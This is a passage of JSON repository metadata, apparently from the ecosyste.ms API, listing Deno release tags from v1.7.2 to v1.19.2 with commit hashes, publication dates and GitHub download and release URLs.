2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","s